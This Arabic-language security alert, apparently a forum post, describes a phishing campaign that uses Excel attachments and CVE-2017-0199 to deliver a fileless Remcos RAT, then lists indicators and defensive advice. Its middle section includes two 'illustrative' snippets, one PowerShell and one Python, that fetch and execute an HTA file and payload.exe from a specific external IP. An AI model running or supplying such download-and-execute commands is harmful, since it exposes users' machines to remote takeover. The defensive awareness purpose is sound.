Remcos RAT عبر Excel - تحذير أمني عملي عاجل!!

Remcos RAT بينشر عبر ملفات Excel - ازاي تحمي نفسك؟​

حملة تصيد أخيرة بتستغل ملفات Microsoft Excel علشان تنشر برنامج ضار معروف اسمه Remcos RAT - بس المرة دي النسخة خالية من الملفات، يعني بتشتغل في الذاكرة ودي حاجة بتخلي اكتشافها أصعب.

إيه القصة؟​

المهاجمين بعتوا إيميلات تصيدية شكلها رسمي، بعنوان زي "أمر شراء"، وفيها مرفق Excel. لما الضحية يفتح الملف، بيستدعي ملف HTA من سيرفر بعيد وبيتنفذ عن طريق mshta.exe. الملف ده متغلف بطبقات JavaScript وVBScript وPowerShell علشان يهرب من برامج الحماية، وفي الآخر بيحمل Remcos ويشغله في الذاكرة بدل ما يحفظه على الهارد.

اللي بيحصل بالترتيب:

• فتح مرفق Excel.
• استغلال ثغرة قُديمة في Office (CVE-2017-0199) أو طرق تحميل ديناميكي.
• تحميل ملف HTA من سيرفر المهاجم.
• تشغيل سكربتات متعددة (JS, VBS, PowerShell) عشان تنزل EXE في الذاكرة.
• تشغيل Remcos RAT خالٍ من الملفات داخل عملية النظام.

Remcos بيعمل إيه؟ (قدرات الـRAT)​

Remcos مش مجرد تروجان صغير - ده أدوات تحكم عن بُعد كاملة. من قدراته:

• جمع معلومات النظام وبيانات تعريف الجهاز.
• تحميل ورفع ملفات.
• تعداد وإنهاء عمليات.
• تعديل خدمات النظام وسجل الويندوز.
• تنفيذ أوامر وبرامج نصية عن بُعد.
• سرقة الحافظة (Clipboard)، تصوير الشاشة، تسجيل الشاشة.
• تشغيل الكاميرا والمايكروفون، وتغيير خلفية الشاشة.
• تعطيل مدخلات الكيبورد أو الماوس.

يعني لو الجهاز اتخترق، المهاجم يقدر يتحكم فيه بالكامل.

إزاي تكتشف إن جهازك معرض للخطر؟ (Indicators of Compromise)​

خليك حريص على العلامات دي:

• سلوك غريب في المتصفح أو فتح صفحات جديدة بدون سبب.
• عمليات mshta أو PowerShell بتشتغل فجأة مع اتصالات لمضيفين غريبين.
• اكتشاف ملفات HTA أو JS بتتحمل من عناوين IP مش معروفة.
• بطء مفاجئ في الجهاز أو نشاط عالي للشبكة من برامج غير معروفة.

أمثلة كود صغيرة تساعدك تفهم إزاي بيتنفذ الهجوم​

مثال بسيط يوضح إزاي mshta بيتنادى لتشغيل ملف HTA (مش كود ضار للتنفيذ، بس للتوضيح):

# مثال توضيحي (لا تنفّذ على جهازك إلا لو فاهم

$htaUrl = "[http://192.3.220.22/cookienetbookinetcahce.hta](http://192.3.220.22/cookienetbookinetcahce.hta)"
Start-Process -FilePath "mshta.exe" -ArgumentList $htaUrl

وكود يوريك فكرة ازاي ممكن سكربت PowerShell ينزل ملف ويشغله في الذاكرة (لأغراض فهمية فقط):

# مثال توضيحي مبسّط جداً

import requests, subprocess
r = requests.get('[http://192.3.220.22/payload.exe](http://192.3.220.22/payload.exe)')
open('payload.exe','wb').write(r.content)
subprocess.run(['payload.exe'])

لو شغّلت حاجة مشابهة دي على جهاز حقيقي، هتكون بتسمح بتنفيذ كود خارجي - فالموضوع خطير جداً.

ليه النسخة الخالية من الملفات (fileless) أخطر؟​

لأنها مش بتسيب ملف EXE واضح على القرص، فبرامج الحماية اللي بتفحص الملفات ممكن ماتكتشفهاش. العملية بتشتغل في ذاكرة العملية نفسها، وده بيصعّب التحليل ويخلي الهجوم يمر أقل كشف.

طرق التصدي والحماية العملية (نصايح سريعة ومباشرة) ​

هنا شوية خطوات عملية للمطورين ومسؤولي الأنظمة ولفرد المستخدم المتوسط:

• ما تفتحش مرفقات غير متوقعة: حتى لو جاتلك من شركة معروفة - اتأكد من المرسل.
• افصل تشغيل الماكروز وملفات HTA: عطل تشغيل الأوامر التلقائية في Office في إعدادات الأمان.
• حدّث Office ونظام التشغيل: الثغرات القديمة ممكن تتستغل بسهولة.
• راقب نشاط PowerShell وmshta: فعل تسجيل الأوامر (logging) وتصفية الاتصالات الخارجية.
• استخدم حلول Endpoint Detection الحديثة: خصوصاً اللي بتدعم الكشف على سلوك الذاكرة (memory behavior).
• نفّذ سياسة منع تنفيذ التعليمات البرمجية من المواقع المؤقتة: whitelisting للتطبيقات.
• تفعيل المصادقة المتعددة (MFA): لو الحسابات المسئولة عن الدفع اتعرضت لخطر، MFA يقلل الأضرار.
• فحص الشبكة وإغلاق الاتصالات لمضيفين مش معروفين: راقب السجلات والـDNS.
• عمل نسخة احتياطية دورية ومجربة: علشان لو حصل اختراق تقدر ترجع.

تطبيق عملي: قواعد بسيطة لرصد ملف HTA مشبوه (YARA-like idea)​

ممكن تستخدم قواعد بسيطة على الويب أو على الـSIEM علشان تنبّه لو في اعتراضات على تحميل HTA من مصادر مش معروفة. مثال فكري (مش قاعدة YARA جاهزة، بس فكرة):

• لو الملف اللى بيتنزل امتداده HTA وبيتحمل من عنوان IP خارجي ثابت، اعتبره مش طبيعي.
• لو mshta.exe اتنادى مع باراميتر URL خارجى - ابدأ تحقيق.
• لو أكتر من عملية PowerShell بتعمل تنزيل وتنفيذ في نفس الجلسة - اشك.

حالات تانية وانتحال DocuSign وZIP المتسلسل​

مؤخراً، المهاجمين ما بقوش يعتمدوا على إيميلات نصية بس - في حملات بتستخدم حسابات DocuSign أصلية علشان تبعت فواتير مزيفة وتخدع الضحايا. كمان في طريقة اسمها "تسلسل ملفات ZIP" - بيلموا أرشيفات ZIP جوا بعض بطريقة بتلخبط أدوات فك الضغط وتخلي المحتوى الخبيث يمر.
(نصيحة: راجع سياسات التعامل مع الفواتير وتأكد من صحة أي طلب دفع غير متوقع حتى لو جا من DocuSign.)

الخلاصة واللي لازم تعمله دلوقتي ​

• ما تفتحش مرفقات مش متوقعة.
• حدّث برامجك وفعل سجلّات PowerShell.
• استخدم أدوات كشف سلوك الذاكرة واشغل مراقبة الشبكة.
• خلّي سياسات الأمان أقوى بالنسبة للفواتير الإلكترونية وDocuSign.
• لو شككت في ملف، انفصل الجهاز عن الشبكة وابدأ تحقيق.